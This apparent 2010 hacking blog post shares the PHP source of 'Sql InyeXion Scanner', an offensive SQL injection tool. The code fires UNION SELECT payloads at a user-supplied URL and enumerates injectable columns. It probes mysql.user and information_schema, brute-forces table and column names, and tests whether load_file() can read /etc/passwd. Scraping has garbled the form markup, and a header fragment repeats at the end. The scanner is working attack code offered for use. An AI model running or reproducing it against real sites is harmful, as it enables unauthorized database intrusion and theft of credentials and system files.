::: Senggol Bacok a.k.a C99 :::

+=+

Demo: http://www.upperbasement.com/STMB/

PHP Code:

  @set_time_limit(0);/*
F-Security - Sql InyeXion Scanner v1
Desarrollado por Knet
Adminitradores - www.remoteexecution.org
Contacto:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
*/$web=$_POST['web'];$end=$_POST['end'];$scann=$_POST['scann'];$union=$_POST['union'];$max=$_POST['max'];$from_format=$_POST['from'];$MySqluser=$_POST['MySqluser'];$InforMationSchema=$_POST['InforMationSchema'];$TblBrt=$_POST['TblBrt'];$TblFormat=$_POST['TblFormat'];$ColBrt=$_POST['ColBrt'];$ColFormat=$_POST['ColFormat'];$LdFl=$_POST['LdFl'];$string='err0r';$union_array=array('-1+UNION+SELECT+','-1\'+UNION+SELECT+','-1+UNION+ALL+SELECT+','-1\'+UNION+ALL+SELECT+','-1/**/UNION/**/SELECT/**/','-1\'/**/UNION/**/SELECT/**/','-1/**/UNION/**/ALL/**/SELECT/**/','-1\'/**/UNION/**/ALL/**/SELECT/**/','1+UNION+SELECT+','1\'+UNION+SELECT+','1+UNION+ALL+SELECT+','1\'+UNION+ALL+SELECT+','1/**/UNION/**/SELECT/**/','1\'/**/UNION/**/SELECT/**/','1/**/UNION/**/ALL/**/SELECT/**/','1\'/**/UNION/**/ALL/**/SELECT/**/');$count_union_array=count($union_array) + 1;$from_array=array('+from+','/**/from/**/','+FROM+','/**/FROM/**/','%20from%20','%20FROM%20');$count_from_array=count($from_array) + 1;$from=$from_array[$from_format];$iny_1=$union_array[$union];$iny_2='0x'.bin2hex($string);$iny_3='0x'.bin2hex($string);
if($max<3 || $max=="" || !is_numeric($max))
{$max=3;
}?>Sql InyeXion Scanner F-Security Team
Web:

if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>" size="60"> Union*:

for($union_for=0;$union_for<=$count_union_array;$union_for++)
{
if($union_array[$union_for]!="")
{
echo '.$union_for.'">'.$union_array[$union_for].''."\n";
}
}?> Max columns:

for($max_a=1;$max_a<=255;$max_a++)
{
echo '.$max_a.'">'.$max_a.''."\n";
}?> eND:

if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">

From* Format: 

for($from_for=0;$from_for<=$count_from_array;$from_for++)
{
if($from_array[$from_for]!="")
{
echo '.$from_for.'">'.$from_array[$from_for].''."\n";
}
}?>

Test mysql.user: Yes No 
Test information_schema: Yes No 
Tables BruteForce: Yes No | tablename | TableName | TABLENAME 
Columns BruteForce: Yes No | columname | ColumName | COLUMNAME 
Test load_file(): Yes No 


if(isset($scann) && $web!="")
{
for($a_for=1;$a_for<=$max;$a_for++)
{$iny_2=$iny_2.'2d'.bin2hex($a_for);$iny=$web.$iny_1.$iny_2;$webmas = $iny;$contenido = @file_get_contents($webmas.$end);$alert = strpos($contenido,$string);
if(!$alert)
{$iny_2=$iny_2.','.$iny_3;$iny_vuln .= $a_for.',';
}
else
{$f_num=$a_for;$web_final=$web.$iny_1.$iny_vuln.$f_num;//echo $webmas;echo '[+] Bug Found in: '.$a_for."
".'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''."
";
echo 'vuln in num/s: |';/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for."
".'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''."
".'vuln in num/s: |';/*********************************SALVANDO***************************************/$vulns=array();
for($search_for=1;$search_for<=$a_for;$search_for++)
{
if(strpos($contenido,$string.'-'.$search_for))
{
echo $search_for.'|';/*********************************SALVANDO**********************
*****************/$_SESSION['all_saveds'] .= $search_for.'|';/*********************************SALVANDO**********************
*****************/array_push($vulns,$search_for);
}
}/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= "
".'---------------------------------------------'.'------------------------------------------------'."
";/*********************************SALVANDO***************************************/echo "
".'---------------------------------------------'.'------------------------------------------------'."
";$a_for=$max;define('vuln','yes');
}
if(!$alert && $a_for==$max)
{
echo 'no vuln in 1->'.$max."\n";
}$contenido='';
}
}/* FINAL SIMPLE SCANN */if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S")
{$from_mysql_user=$from.'mysql.user';$contenido = @file_get_contents($webmas.$from_mysql_user.$end);$alert_mysql_user = strpos($contenido,$string);
if($alert_mysql_user)
{
echo '[+] MySQL Database Found:'.'
';
echo '.htmlentities($web_final.$from_mysql_user.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_mysql_user.$end).''."
";
echo '[+] Columns default in mysql.user: Host,User,Password'.'
';
}
else
{
echo '[+] MySQL Database not Found:'.'
';
}
echo '-------------------------------'."
";
}/* FINAL Mysql.user TEST */if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S")
{$from_information_schema=$from.'information_schema.tables';$contenido = @file_get_contents($webmas.$from_information_schema.$end);$alert_information_schema = strpos($contenido,$string);
if($alert_information_schema)
{
echo '[+] Information_Schema Database Found:'.'
';
echo '.htmlentities($web_final.$from_information_schema.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_information_schema.$end).''."
";
echo '[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.'
';
echo '---------------'."
";
echo '[+] Columns default in information_schema.columns:
TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'.'
';
}
else
{
echo '[+] Information_Schema Database not Found:'.'
';
}
echo '-------------------------------'."
";
}/* FINAL information_schema database */if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat))
{
switch($TblFormat)
{
case 1:$file_txt_tables='1.txt';
break;
case 2:$file_txt_tables='2.txt';
break;
case 3:$file_txt_tables='3.txt';
break;
default:$file_txt_tables='1.txt';
}$file_tables=@file($file_txt_tables);$count_tables=count($file_tables);
for($t_for=0;$t_for<=$count_tables;$t_for++)
{$file_tables[$t_for]=trim($file_tables[$t_for]);
if($file_tables[$t_for] != "")
{$from_table=$from.$file_tables[$t_for];$contenido = @file_get_contents($webmas.$from_table.$end);$alert_table = strpos($contenido,$string);
if($alert_table)
{
echo '[+] Table Found: '.$file_tables[$t_for]."
";
echo '.htmlentities($web_final.$from_table.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_table.$end).''."
";/*
echo 'webmas:'.$webmas.'
';
echo 'webfinal:'.$web_final.'
';
echo 'web:'.$web.'
';
*/if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat))
{/****************************************************************
*******/switch($ColFormat)
{
case 1:$file_txt_columns='1.txt';
break;
case 2:$file_txt_columns='2.txt';
break;
case 3:$file_txt_columns='3.txt';
break;
default:$file_txt_columns='1.txt';
}$file_columns=@file($file_txt_columns);$count_columns=count($file_columns);$count_vulns=count($vulns);$count_vulns = $count_vulns + 1;
for($c_for=0;$c_for<=$count_columns;$c_for++)
{$file_columns[$c_for]=trim($file_columns[$c_for]);
if($file_columns[$c_for] != "")
{
for($cols_for=1;$cols_for<=$f_num;$cols_for++)
{
if(in_array($cols_for,$vulns))
{
if($cols_for != $f_num)
{$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].'),';
}
else
{$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].')';
}
}
else
{
if($cols_for != $f_num)
{$cols_brt_string .= $cols_for.',';
}
else
{$cols_brt_string .= $cols_for;
}
}
}$col_contenido=@file_get_contents($web.$iny_1.$cols_brt_string.$from_table.$end);$alert_col = strpos($col_contenido,$string);
if($alert_col)
{
if($cols_vulns=="")
{$cols_vulns =$file_columns[$c_for];
}
else
{$cols_vulns .= ','.$file_columns[$c_for];
}/*
$cols_brt_string=str_replace('concat(0x'.bin2hex($string).',','',
$cols_brt_string);
$cols_brt_string=str_replace(')','',
$cols_brt_string);
echo '[+] Column Found in '.
$file_tables[$t_for].
': '.$file_columns[$c_for].'
';
echo '
htmlentities($web.
$iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'.
htmlentities($web.
$iny_1.$cols_brt_string.$from_table.$end).''."
";
*/}$cols_brt_string='';
}/**/}
if($cols_vulns!="")
{
echo '[+] Column/s Found in '.$file_tables[$t_for].' : '.$cols_vulns.'
';$cols_vulns='';
}/****************************************************************
*******/}
echo '-------------------------------'."
";
}
}
}
}/* FINAL TABLE AND COLUMNS BRUTEFORCE */if(vuln=="yes" && isset($LdFl) && $LdFl=="S")
{$string_alert_loadfile = 'root:x:';
for($load_file_for=1;$load_file_for<=$f_num;$load_file_for++)
{
if(in_array($load_file_for,$vulns) && load_file!="yes")
{
if($load_file_for != $f_num)
{$load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.',';
}
else
{$load_file_string .= 'load_file('.$load_file_for.')';
}define('load_file','yes');
}
else
{
if($load_file_for != $f_num)
{$load_file_string .= $load_file_for.',';
}
else
{$load_file_string .= $load_file_for;
}
}
}$web_load=$web.$iny_1.$load_file_string.$end;$contenido_load = @file_get_contents($web_load);$alert_load_file = strpos($contenido_load,$string_alert_loadfile);
echo '[+] load_file(): ';
if($alert_load_file)
{
echo 'ENABLED'.'
';
echo '.htmlentities($web_load).'" TARGET=BLANK>'.htmlentities($web_load).''."
";
}
else
{
echo 'DISABLED'.'
';
}
echo '-------------------------------'."
";
}/* FINAL LOAD_FILE() TEST */?>

::: Senggol Bacok a.k.a C99 :::

Sabtu, 17 Juli 2010

[SOURCE][PHP] Sql InyeXion Scanner

Sql InyeXion Scanner F-Security Team

Sql InyeXion Scanner F-Security Team
Web: if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>" size="60">	Union*: for($union_for=0;$union_for<=$count_union_array;$union_for++) { if($union_array[$union_for]!="") { echo '.$union_for.'">'.$union_array[$union_for].''."\n"; } }?>	Max columns: for($max_a=1;$max_a<=255;$max_a++) { echo '.$max_a.'">'.$max_a.''."\n"; }?>	eND: if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">